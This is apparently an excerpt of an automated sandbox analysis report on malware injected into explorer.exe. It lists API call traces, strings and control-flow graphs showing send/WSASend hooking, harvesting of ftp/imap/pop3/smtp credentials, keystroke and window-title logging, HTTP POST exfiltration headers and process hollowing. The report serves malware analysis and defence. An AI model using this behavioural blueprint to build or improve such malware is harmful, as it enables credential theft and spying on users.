                          • Part of subcall function 008424D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0084250D
                          • Part of subcall function 008424D5: CloseHandle.KERNEL32(00000000), ref: 00842566
                        • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 008413B8
                        • GetProcAddress.KERNEL32(00000000), ref: 008413BF
                        • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 008413E4
                        • GetProcAddress.KERNEL32(00000000), ref: 008413EB
                          • Part of subcall function 00841DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00841E1D
                        • RtlExitUserThread.NTDLL(00000000), ref: 0084141D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                        • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                        • API String ID: 706757162-1430290102
                        • Opcode ID: 02147c28de80bb72a11092e2c4495b70b29e67f6d2d1ccf48b7116c9274322a9
                        • Instruction ID: 1125d3f3f0b86674e3c91009c6f6644668cbe478975ffe8d3caf4f1d62af9582
                        • Opcode Fuzzy Hash: 02147c28de80bb72a11092e2c4495b70b29e67f6d2d1ccf48b7116c9274322a9
                        • Instruction Fuzzy Hash: 6E31843434461CBBCF106FA4DD0EB5E3A56FF16B42F104124F606D7291DBB58A51CB95
                        Function 00841647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 235 841647-84165a 236 841660-841662 235->236 237 841748-84174f 235->237 236->237 238 841668-84166b 236->238 238->237 239 841671-84167d lstrlen 238->239 240 841747 239->240 241 841683-84168a lstrlen 239->241 240->237 241->240 242 841690-8416a8 getpeername 241->242 242->240 243 8416ae-8416ca inet_ntoa htons 242->243 243->240 244 8416cc-8416d4 243->244 245 8416d6-8416d9 244->245 246 841708 244->246 248 8416f3-8416f8 245->248 249 8416db-8416de 245->249 247 84170d-84173c call 842861 wsprintfA call 8424ae 246->247 247->240 259 84173e-841745 call 842843 247->259 248->247 250 8416e0-8416e3 249->250 251 841701-841706 249->251 253 8416e5-8416ea 250->253 254 8416fa-8416ff 250->254 251->247 253->248 256 8416ec-8416f1 253->256 254->247 256->240 256->248 259->240
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                        • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                        • API String ID: 3379139566-1703351401
                        • Opcode ID: 1e4eefa89471c2f31c3ce2ceb13be3039e2253725c546222576a89006512035c
                        • Instruction ID: 703623b1cab992424af7d191cacd9fda73074489a93dba7a8d377c0749a11de4
                        • Opcode Fuzzy Hash: 1e4eefa89471c2f31c3ce2ceb13be3039e2253725c546222576a89006512035c
                        • Instruction Fuzzy Hash: BC21B036E0021DABDF115FED8D8C5BEBAA9FB45301B184175E904E3219DA34CE80DA60
                        Function 00841752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 267 841752-841774 GetModuleHandleA GetProcAddress 268 841776-8417c0 RtlZeroMemory * 4 267->268 269 8417c1-8417c6 267->269 268->269
                        APIs
                        • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00841539,?,?,?,0084144B,?), ref: 00841763
                        • GetProcAddress.KERNEL32(00000000), ref: 0084176A
                        • RtlZeroMemory.NTDLL(00844228,00000104), ref: 00841788
                        • RtlZeroMemory.NTDLL(00844118,00000104), ref: 00841790
                        • RtlZeroMemory.NTDLL(00844330,00000104), ref: 00841798
                        • RtlZeroMemory.NTDLL(00844000,00000104), ref: 008417A1
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryZero$AddressHandleModuleProc
                        • String ID: %s%s%s%s$ntdll.dll$sscanf
                        • API String ID: 1490332519-278825019
                        • Opcode ID: 9200d4eeb42cbf76a925679dcab49e8aa0e65580488cdbf63a139dbbba187b77
                        • Instruction ID: 194b5354edae629d6f11bd5447cd15b99c63d73864ac891fb46b58de81e1613e
                        • Opcode Fuzzy Hash: 9200d4eeb42cbf76a925679dcab49e8aa0e65580488cdbf63a139dbbba187b77
                        • Instruction Fuzzy Hash: 24F08932780B3C33812023EA7C0AE47BD5CF656FE63121256B624E3341D9DD690085B4
                        Function 008424D5 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 008424E7
                        • GetCurrentThreadId.KERNEL32 ref: 008424EF
                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 008424FF
                        • Thread32First.KERNEL32(00000000,0000001C), ref: 0084250D
                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0084252C
                        • SuspendThread.KERNEL32(00000000), ref: 0084253C
                        • CloseHandle.KERNEL32(00000000), ref: 0084254B
                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 0084255B
                        • CloseHandle.KERNEL32(00000000), ref: 00842566
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                        • String ID:
                        • API String ID: 1467098526-0
                        • Opcode ID: 9fbcfd9087edad87a787056e34c6b3d155ab37fbc34445c3bc3ea2784a458d51
                        • Instruction ID: e4f265c31358e20bc663ca0511806d6f58bfceec35002e2de97a93da304e540b
                        • Opcode Fuzzy Hash: 9fbcfd9087edad87a787056e34c6b3d155ab37fbc34445c3bc3ea2784a458d51
                        • Instruction Fuzzy Hash: 17115BB5408709EFD7119F60AC4CB6EBBA8FF9A745F050629FA41D2150D7308A49CBA2
                        Function 00841F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 281 841f4a-841fa5 call 8422b8 call 842861 call 8427e2 call 842374 290 841fa7-841fbe 281->290 291 841fc0-841fcc 281->291 294 841fd0-841fd2 290->294 291->294 295 8422a6-8422b5 call 842843 294->295 296 841fd8-84200f RtlZeroMemory 294->296 300 842015-842030 296->300 301 84229e-8422a5 296->301 302 842062-842074 300->302 303 842032-842043 call 8422e5 300->303 301->295 310 842078-84207a 302->310 308 842045-842054 303->308 309 842056 303->309 313 842058-842060 308->313 309->313 311 842080-8420dc call 842731 310->311 312 84228b-842291 310->312 321 842284 311->321 322 8420e2-8420e7 311->322 316 842293-842295 call 842843 312->316 317 84229a 312->317 313->310 316->317 317->301 321->312 323 842101-84212f call 842861 wsprintfW 322->323 324 8420e9-8420fa 322->324 327 842131-842133 323->327 328 842148-84215f 323->328 324->323 329 842134-842137 327->329 333 842161-842197 call 842861 wsprintfW 328->333 334 84219e-8421b8 328->334 331 842142-842144 329->331 332 842139-84213e 329->332 331->328 332->329 335 842140 332->335 333->334 339 842261-842277 call 842843 334->339 340 8421be-8421d1 334->340 335->328 347 842280 339->347 348 842279-84227b call 842843 339->348 340->339 344 8421d7-8421ed call 842861 340->344 350 8421ef-8421fa 344->350 347->321 348->347 352 8421fc-842209 call 842826 350->352 353 84220e-842225 350->353 352->353 357 842227 353->357 358 842229-842236 353->358 357->358 358->350 359 842238-84223c 358->359 360 842256-84225d call 842843 359->360 361 84223e 359->361 360->339 362 84223e call 842815 361->362 364 842243-842250 RtlMoveMemory 362->364 364->360
                        APIs
                          • Part of subcall function 00842861: GetProcessHeap.KERNEL32(00000008,0000A000,008410CC), ref: 00842864
                          • Part of subcall function 00842861: RtlAllocateHeap.NTDLL(00000000), ref: 0084286B
                          • Part of subcall function 008427E2: lstrlen.KERNEL32(008440DA,?,00000000,00000000,00841F86,74DE8A60,008440DA,00000000), ref: 008427EA
                          • Part of subcall function 008427E2: MultiByteToWideChar.KERNEL32(00000000,00000000,008440DA,00000001,00000000,00000000), ref: 008427FC
                          • Part of subcall function 00842374: RtlZeroMemory.NTDLL(?,00000018), ref: 00842386
                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 00841FE2
                        • wsprintfW.USER32 ref: 0084211B
                        • wsprintfW.USER32 ref: 00842186
                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00842250
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                        • API String ID: 4204651544-1701262698
                        • Opcode ID: 2f95c48a99e7d14d6a223a4477863cc2ae069489d3a940a52a358053ad6a6454
                        • Instruction ID: 23fae729af151f0f8081b3d5af900eeb8766516ac3d6d0bba521e045922d4fe5
                        • Opcode Fuzzy Hash: 2f95c48a99e7d14d6a223a4477863cc2ae069489d3a940a52a358053ad6a6454
                        • Instruction Fuzzy Hash: C7A15975608309AFD710DF68D885A2FBBE8FB89344F50492DF985D3361EA74DA04CB62
                        Function 008425AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 366 8425ad-8425c9 OpenProcess 367 842600-842607 366->367 368 8425cb-8425da IsWow64Process 366->368 369 8425f7 368->369 370 8425dc-8425ec IsWow64Process 368->370 372 8425f9-8425fa CloseHandle 369->372 371 8425ee-8425f5 370->371 370->372 371->372 372->367
                        APIs
                        • OpenProcess.KERNEL32(00000400,00000000,?,74DEE800,?,?,microsoftedgecp.exe,00841287), ref: 008425BF
                        • IsWow64Process.KERNEL32(000000FF,?), ref: 008425D1
                        • IsWow64Process.KERNEL32(00000000,?), ref: 008425E4
                        • CloseHandle.KERNEL32(00000000), ref: 008425FA
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Wow64$CloseHandleOpen
                        • String ID: microsoftedgecp.exe
                        • API String ID: 331459951-1475183003
                        • Opcode ID: 7b0470eb3ae1f6509283da227d8a2b956f0b6e1a9f12d5da7da08cca6ee6f114
                        • Instruction ID: 9a058b0a66b76446a28faca04038522ef2daddfa113f8f0493fbadb98f65cab3
                        • Opcode Fuzzy Hash: 7b0470eb3ae1f6509283da227d8a2b956f0b6e1a9f12d5da7da08cca6ee6f114
                        • Instruction Fuzzy Hash: 5DF0547594662CFF9B10DF949D988EEB76CFF02355B55036AF904D2140D7314F04E6A4
                        Function 00841B17 Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 421 841b17-841b2c 422 841b60-841b68 421->422 423 841b2e 421->423 425 841bc3-841bcb 422->425 426 841b6a-841b6f 422->426 424 841b30-841b5e RtlMoveMemory 423->424 424->422 424->424 427 841bcd-841bdf 425->427 428 841c0b 425->428 429 841bbe-841bc1 426->429 427->428 430 841be1-841bfe LdrProcessRelocationBlock 427->430 431 841c0d-841c12 428->431 429->425 432 841b71-841b84 LoadLibraryA 429->432 430->428 433 841c00-841c04 430->433 434 841c15-841c17 432->434 435 841b8a-841b8f 432->435 433->428 436 841c06-841c09 433->436 434->431 437 841bb6-841bb9 435->437 436->428 436->430 438 841b91-841b95 437->438 439 841bbb 437->439 440 841b97-841b9a 438->440 441 841b9c-841b9f 438->441 439->429 442 841ba1-841bab GetProcAddress 440->442 441->442 442->434 443 841bad-841bb3 442->443 443->437
                        APIs
                        • RtlMoveMemory.NTDLL(?,?,?), ref: 00841B4E
                        • LoadLibraryA.KERNEL32(?,00844434,00000000,00000000,74DF2EE0,00000000,00841910,?,?,?,00000001,?,00000000), ref: 00841B76
                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00841BA3
                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00841BF4
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                        • String ID:
                        • API String ID: 3827878703-0
                        • Opcode ID: e549564f270788fbd34c59bf4763a347c6ac964be301a5b12217beb95dc68d5a
                        • Instruction ID: 674c82da2e49d9e24d7c14e76e2751681184b4c85384435cddc6793034973ce5
                        • Opcode Fuzzy Hash: e549564f270788fbd34c59bf4763a347c6ac964be301a5b12217beb95dc68d5a
                        • Instruction Fuzzy Hash: 0931A17570061AABCF24CF29CC88B76B7E8FF15329B14456DE886C7600E731E885CBA0

                        Execution Graph

                        Execution Coverage:8.8%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:9
                        Total number of Limit Nodes:2
                        execution_graph 764 f79fab 765 f79fd8 764->765 767 f79ff8 764->767 768 f7a048 765->768 772 f7a04d 768->772 769 f7a135 LoadLibraryA 769->772 770 f7a190 VirtualProtect VirtualProtect 771 f7a1e8 770->771 771->771 772->769 772->770 773 f7a185 772->773 773->767

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_00F71576 1 Function_00F72BF4 2 Function_00F72774 3 Function_00F71B70 4 Function_00F71E70 5 Function_00F72B70 32 Function_00F71838 5->32 50 Function_00F71A04 5->50 6 Function_00F730F0 12 Function_00F71860 6->12 25 Function_00F71C58 6->25 6->32 56 Function_00F71A88 6->56 58 Function_00F72508 6->58 7 Function_00F725FC 8 Function_00F714F9 9 Function_00F718F8 10 Function_00F72860 10->2 10->3 39 Function_00F72620 10->39 11 Function_00F71560 12->3 13 Function_00F724E0 14 Function_00F7156C 15 Function_00F718E8 16 Function_00F7B0D5 17 Function_00F71254 18 Function_00F714D4 19 Function_00F71DD4 19->32 20 Function_00F72054 20->4 20->9 20->12 21 Function_00F718D0 20->21 28 Function_00F71F40 20->28 20->32 33 Function_00F71938 20->33 45 Function_00F72010 20->45 53 Function_00F7188C 20->53 22 Function_00F71D50 22->32 23 Function_00F7355C 23->3 23->6 23->23 23->32 38 Function_00F73220 23->38 24 Function_00F74059 26 Function_00F725C4 26->7 27 Function_00F74A41 28->9 28->32 29 Function_00F7A048 54 Function_00F7A00A 29->54 30 Function_00F714B2 31 Function_00F71BB0 34 Function_00F72CB8 34->12 34->32 40 Function_00F71D20 34->40 35 Function_00F745A7 36 Function_00F71822 37 Function_00F741A1 38->3 38->10 38->31 38->32 38->33 43 Function_00F71C28 38->43 57 Function_00F71C08 38->57 41 Function_00F73020 41->3 48 Function_00F72E98 41->48 42 Function_00F79FAB 42->29 44 Function_00F7B115 45->50 46 Function_00F7141D 47 Function_00F72418 47->12 47->20 47->32 48->1 48->5 48->19 48->34 48->50 59 Function_00F72E08 48->59 49 Function_00F71405 51 Function_00F71000 52 Function_00F72E80 53->32 55 Function_00F71508 58->13 58->21 58->26 59->12 59->15 59->22 59->47 60 Function_00F73088 60->3 60->48

                        Executed Functions

                        Function 00F7355C Relevance: 1.6, APIs: 1, Instructions: 73nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 118 f7355c-f7356c call f71b70 121 f73572-f735a5 call f71838 118->121 122 f735fc-f73601 118->122 126 f735a7 call f71838 121->126 127 f735d1-f735f6 NtUnmapViewOfSection 121->127 129 f735ac-f735c5 126->129 131 f73608-f73617 call f73220 127->131 132 f735f8-f735fa 127->132 129->127 138 f73621-f7362a 131->138 139 f73619-f7361c call f7355c 131->139 132->122 134 f73602-f73607 call f730f0 132->134 134->131 139->138
                        APIs
                        • NtUnmapViewOfSection.NTDLL ref: 00F735D8
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2941442653.0000000000F71000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F71000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_f71000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: SectionUnmapView
                        • String ID:
                        • API String ID: 498011366-0
                        • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                        • Instruction ID: f02b85b299c6d45abf9d7caec5e2e76427aca82f2f89f2a7304dc8e81174e567
                        • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                        • Instruction Fuzzy Hash: 3111C830A159096FEB58BBBC9C9E67937A0FB54311F58813BA41DC76A1DA3D8A40E702
                        Function 00F73220 Relevance: 9.2, APIs: 6, Instructions: 241processstringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 f73220-f7325b call f71838 3 f73261-f73273 CreateToolhelp32Snapshot 0->3 4 f73549-f73554 SleepEx 3->4 5 f73279-f7328f Process32First 3->5 4->3 6 f73538-f7353a 5->6 7 f73294-f732ac lstrcmpi 6->7 8 f73540-f73543 FindCloseChangeNotification 6->8 9 f732b2-f732c6 7->9 10 f7348c-f73495 call f71bb0 7->10 8->4 9->10 14 f732cc-f732e0 9->14 15 f7349b-f734a4 call f71c08 10->15 16 f7352a-f73532 Process32Next 10->16 14->10 21 f732e6-f732fa 14->21 15->16 20 f734aa-f734b1 call f71c28 15->20 16->6 20->16 25 f734b3-f734c1 call f71b70 20->25 21->10 26 f73300-f73314 21->26 25->16 30 f734c3-f73525 call f71938 call f72860 call f71938 25->30 26->10 31 f7331a-f7332e 26->31 30->16 31->10 34 f73334-f73348 31->34 34->10 39 f7334e-f73362 34->39 39->10 43 f73368-f7337c 39->43 43->10 45 f73382-f73396 43->45 45->10 47 f7339c-f733b0 45->47 47->10 49 f733b6-f733ca 47->49 49->10 51 f733d0-f733e4 49->51 51->10 53 f733ea-f733fe 51->53 53->10 55 f73404-f73418 53->55 55->10 57 f7341a-f7342e 55->57 57->10 59 f73430-f73444 57->59 59->10 61 f73446-f7345a 59->61 61->10 63 f7345c-f73470 61->63 63->10 65 f73472-f73486 63->65 65->10 65->16
                        APIs
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2941442653.0000000000F71000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F71000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_f71000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSleepSnapshotToolhelp32lstrcmpi
                        • String ID:
                        • API String ID: 2313719238-0
                        • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                        • Instruction ID: 53a6eeb7f0e144e12537ff0d549f052ad1083f528cf86ad29a3a209f1160bc86
                        • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                        • Instruction Fuzzy Hash: 6F8142312186099FE71AEF54EC58BEAB7A1FB50750F04861FA046C3160EF78DA04EB82
                        Function 00F7A048 Relevance: 4.7, APIs: 3, Instructions: 223memorylibraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 67 f7a048-f7a04b 68 f7a055-f7a059 67->68 69 f7a065 68->69 70 f7a05b-f7a063 68->70 71 f7a067 69->71 72 f7a04d-f7a053 69->72 70->69 73 f7a06a-f7a071 71->73 72->68 75 f7a073-f7a07b 73->75 76 f7a07d 73->76 75->76 76->73 77 f7a07f-f7a082 76->77 78 f7a097-f7a0a4 77->78 79 f7a084-f7a092 77->79 89 f7a0a6-f7a0a8 78->89 90 f7a0be-f7a0cc call f7a00a 78->90 80 f7a094-f7a095 79->80 81 f7a0ce-f7a0e9 79->81 80->78 83 f7a11a-f7a11d 81->83 84 f7a122-f7a129 83->84 85 f7a11f-f7a120 83->85 88 f7a12f-f7a133 84->88 87 f7a101-f7a105 85->87 91 f7a107-f7a10a 87->91 92 f7a0eb-f7a0ee 87->92 93 f7a135-f7a14e LoadLibraryA 88->93 94 f7a190-f7a1e4 VirtualProtect * 2 88->94 95 f7a0ab-f7a0b2 89->95 90->68 91->84 96 f7a10c-f7a110 91->96 92->84 100 f7a0f0 92->100 99 f7a14f-f7a156 93->99 97 f7a1e8-f7a1ed 94->97 112 f7a0b4-f7a0ba 95->112 113 f7a0bc 95->113 101 f7a112-f7a119 96->101 102 f7a0f1-f7a0f5 96->102 97->97 103 f7a1ef-f7a1fe 97->103 99->88 105 f7a158 99->105 100->102 101->83 102->87 106 f7a0f7-f7a0f9 102->106 109 f7a164-f7a16c 105->109 110 f7a15a-f7a162 105->110 106->87 111 f7a0fb-f7a0ff 106->111 114 f7a16e-f7a17a 109->114 110->114 111->87 111->91 112->113 113->90 113->95 116 f7a185-f7a18f 114->116 117 f7a17c-f7a183 114->117 117->99
                        APIs
                        • LoadLibraryA.KERNELBASE ref: 00F7A147
                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 00F7A1BB
                        • VirtualProtect.KERNELBASE ref: 00F7A1D9
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2941442653.0000000000F77000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F77000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_f77000_explorer.jbxd
                        Similarity
                        • API ID: ProtectVirtual$LibraryLoad
                        • String ID:
                        • API String ID: 895956442-0
                        • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                        • Instruction ID: e404077e2627cdea0ca90cb08a3d6a4a6a15c0f5eec89f508403bf7cc7abde5e
                        • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                        • Instruction Fuzzy Hash: 2951993275891D4ADB24AB389CC07BDB3C1E795335F594A2BD08EC3284E999D846A783

                        Execution Graph

                        Execution Coverage:15.1%
                        Dynamic/Decrypted Code Coverage:97.6%
                        Signature Coverage:18.6%
                        Total number of Nodes:328
                        Total number of Limit Nodes:7
                        execution_graph 770 6d29bd VirtualAlloc 1023 6d182d 1024 6d1838 RtlEnterCriticalSection lstrlenW 1023->1024 1025 6d18a8 RtlLeaveCriticalSection Sleep 1024->1025 1026 6d1854 1024->1026 1025->1024 1026->1025 1029 6d29eb VirtualQuery GetProcessHeap HeapFree 1026->1029 1032 6d25a4 1026->1032 1038 6d200d 1026->1038 1049 6d29ae VirtualFree 1026->1049 1050 6d2a09 GetProcessHeap RtlAllocateHeap 1026->1050 1029->1026 1033 6d25b9 CryptBinaryToStringA 1032->1033 1034 6d25e8 1032->1034 1033->1034 1035 6d25cc 1033->1035 1034->1026 1051 6d2a09 GetProcessHeap RtlAllocateHeap 1035->1051 1037 6d25d7 CryptBinaryToStringA 1037->1034 1039 6d2030 1038->1039 1040 6d2023 lstrlen 1038->1040 1052 6d2a09 GetProcessHeap RtlAllocateHeap 1039->1052 1040->1039 1042 6d2038 lstrcat 1043 6d206d lstrcat 1042->1043 1044 6d2074 1042->1044 1043->1044 1053 6d20a1 1044->1053 1047 6d29eb 3 API calls 1048 6d2097 1047->1048 1048->1026 1049->1026 1050->1026 1051->1037 1052->1042 1087 6d240f 1053->1087 1057 6d20ce 1092 6d298a lstrlen MultiByteToWideChar 1057->1092 1059 6d20dd 1093 6d24cc RtlZeroMemory 1059->1093 1062 6d212f RtlZeroMemory 1064 6d2164 1062->1064 1063 6d29eb 3 API calls 1065 6d2084 1063->1065 1068 6d23f1 1064->1068 1070 6d2192 1064->1070 1095 6d243d 1064->1095 1065->1047 1067 6d23d7 1067->1068 1069 6d29eb 3 API calls 1067->1069 1068->1063 1069->1068 1070->1067 1104 6d2a09 GetProcessHeap RtlAllocateHeap 1070->1104 1072 6d2262 wsprintfW 1073 6d2288 1072->1073 1077 6d22f5 1073->1077 1105 6d2a09 GetProcessHeap RtlAllocateHeap 1073->1105 1075 6d22c2 wsprintfW 1075->1077 1076 6d23b4 1078 6d29eb 3 API calls 1076->1078 1077->1076 1106 6d2a09 GetProcessHeap RtlAllocateHeap 1077->1106 1080 6d23c8 1078->1080 1080->1067 1081 6d29eb 3 API calls 1080->1081 1081->1067 1082 6d23ad 1084 6d29eb 3 API calls 1082->1084 1083 6d2340 1083->1082 1107 6d29bd VirtualAlloc 1083->1107 1084->1076 1086 6d239a RtlMoveMemory 1086->1082 1088 6d2419 1087->1088 1089 6d20c0 1087->1089 1090 6d2841 2 API calls 1088->1090 1091 6d2a09 GetProcessHeap RtlAllocateHeap 1089->1091 1090->1089 1091->1057 1092->1059 1094 6d20ed 1093->1094 1094->1062 1094->1068 1097 6d244a 1095->1097 1098 6d24ab 1095->1098 1096 6d244e DnsQuery_W 1096->1097 1097->1096 1097->1098 1099 6d248d DnsFree inet_ntoa 1097->1099 1098->1070 1099->1097 1100 6d24ad 1099->1100 1108 6d2a09 GetProcessHeap RtlAllocateHeap 1100->1108 1102 6d24b7 1109 6d298a lstrlen MultiByteToWideChar 1102->1109 1104->1072 1105->1075 1106->1083 1107->1086 1108->1102 1109->1098 771 6d29ae VirtualFree 1110 6d162b 1111 6d163c 1110->1111 1116 6d16aa 1110->1116 1112 6d164b GetKeyboardState 1111->1112 1111->1116 1113 6d165c ToUnicode 1112->1113 1112->1116 1114 6d1684 1113->1114 1114->1116 1117 6d16b9 RtlEnterCriticalSection 1114->1117 1118 6d17ce RtlLeaveCriticalSection 1117->1118 1119 6d16d2 lstrlenW 1117->1119 1118->1116 1120 6d16ed lstrlenW 1119->1120 1121 6d17bd 1119->1121 1122 6d1702 1120->1122 1121->1118 1123 6d174e GetForegroundWindow 1122->1123 1124 6d1723 1122->1124 1123->1121 1125 6d175a GetWindowTextW 1123->1125 1124->1121 1136 6d17dc 1124->1136 1126 6d177a lstrcmpW 1125->1126 1127 6d1771 GetClassNameW 1125->1127 1129 6d17bf lstrcatW 1126->1129 1130 6d178b lstrcpyW 1126->1130 1127->1126 1129->1121 1133 6d17dc 4 API calls 1130->1133 1131 6d172f wsprintfW 1132 6d17b6 1131->1132 1135 6d29eb 3 API calls 1132->1135 1134 6d1798 wsprintfW 1133->1134 1134->1132 1135->1121 1139 6d2a09 GetProcessHeap RtlAllocateHeap 1136->1139 1138 6d17ed GetLocalTime wsprintfW 1138->1131 1139->1138 1140 6d1581 1141 6d158e 1140->1141 1142 6d1623 1141->1142 1143 6d15a7 GlobalFix 1141->1143 1143->1142 1145 6d15b5 1143->1145 1144 6d15e4 1161 6d293e 1144->1161 1145->1144 1146 6d15c0 1145->1146 1147 6d15c5 lstrlenW 1146->1147 1148 6d15f2 1146->1148 1160 6d2a09 GetProcessHeap RtlAllocateHeap 1147->1160 1150 6d2724 VirtualQuery 1148->1150 1152 6d15fb 1150->1152 1154 6d15ff lstrlenW 1152->1154 1155 6d161b GlobalUnWire 1152->1155 1153 6d15d8 lstrcatW 1153->1148 1154->1155 1156 6d160a 1154->1156 1155->1142 1157 6d16b9 19 API calls 1156->1157 1158 6d1614 1157->1158 1159 6d29eb 3 API calls 1158->1159 1159->1155 1160->1153 1162 6d294d lstrlen 1161->1162 1163 6d2982 1161->1163 1168 6d2a09 GetProcessHeap RtlAllocateHeap 1162->1168 1163->1148 1165 6d2963 MultiByteToWideChar 1165->1163 1166 6d297b 1165->1166 1167 6d29eb 3 API calls 1166->1167 1167->1163 1168->1165 772 6d9ae0 773 6d9ca4 772->773 774 6d9aeb 772->774 773->773 775 6d9bfa LoadLibraryA 774->775 779 6d9c3f VirtualProtect VirtualProtect 774->779 776 6d9c11 775->776 776->774 778 6d9c23 GetProcAddress 776->778 778->776 780 6d9c39 778->780 779->773 781 6d1000 782 6d1007 781->782 783 6d1010 781->783 785 6d1016 782->785 827 6d2724 VirtualQuery 785->827 787 6d1098 787->783 790 6d102c RtlMoveMemory 791 6d104d 790->791 792 6d1072 NtUnmapViewOfSection GetCurrentProcessId 790->792 857 